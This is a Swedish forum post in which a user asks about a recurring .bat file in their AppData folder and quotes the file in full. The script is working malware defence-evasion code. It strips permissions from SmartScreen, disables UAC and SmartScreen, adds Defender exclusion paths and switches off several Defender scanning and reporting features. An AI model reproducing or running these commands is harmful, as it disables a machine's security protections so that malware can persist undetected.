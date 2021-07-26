- Registrerad
- Apr 2021
Konstig .bat-fil som vill starta.
Hej!
Min dator varnar för att den försöker köra en .bat-fil som ligger i mappen c:\users\lycke\appdata .. När jag kollar innehåll i filen ser det ut som nedanstående. Jag tog bort filen men nu har den kommit tillbaka. Någon som vet vad det är som händer?
@echo off
takeown /f "%systemroot%\\System32\\smartscreen.exe" /a
icacls "%systemroot%\\System32\\smartscreen.exe" /reset
taskkill /im smartscreen.exe /f
icacls "%systemroot%\\System32\\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v EnableSmartScreen /t REG_DWORD /d 0 /f
powershell.exe -command "Add-MpPreference -ExclusionPath ""%LOCALAPPDATA%"""
powershell.exe -command "Add-MpPreference -ExclusionPath ""%LOCALAPPDATA%\Updates"""
powershell.exe -command "Add-MpPreference -ExclusionPath ""%LOCALAPPDATA%\Update"""
powershell.exe -command "Add-MpPreference -ExclusionPath ""%LOCALAPPDATA%\Packages\Update"""
powershell.exe -command "Add-MpPreference -ExclusionPath ""%LOCALAPPDATA%\Google\Update"""
powershell.exe -command "Add-MpPreference -ExclusionPath ""%LOCALAPPDATA%\Mozilla\Update"""
powershell.exe -command "Add-MpPreference -ExclusionPath ""%LOCALAPPDATA%\Microsoft\Update"""
REM powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
REM powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
REM powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
REM powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
REM powershell.exe -command "Set-MpPreference -PUAProtection disable"
powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5"
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
REM powershell.exe -command "netsh advfirewall set allprofiles state off"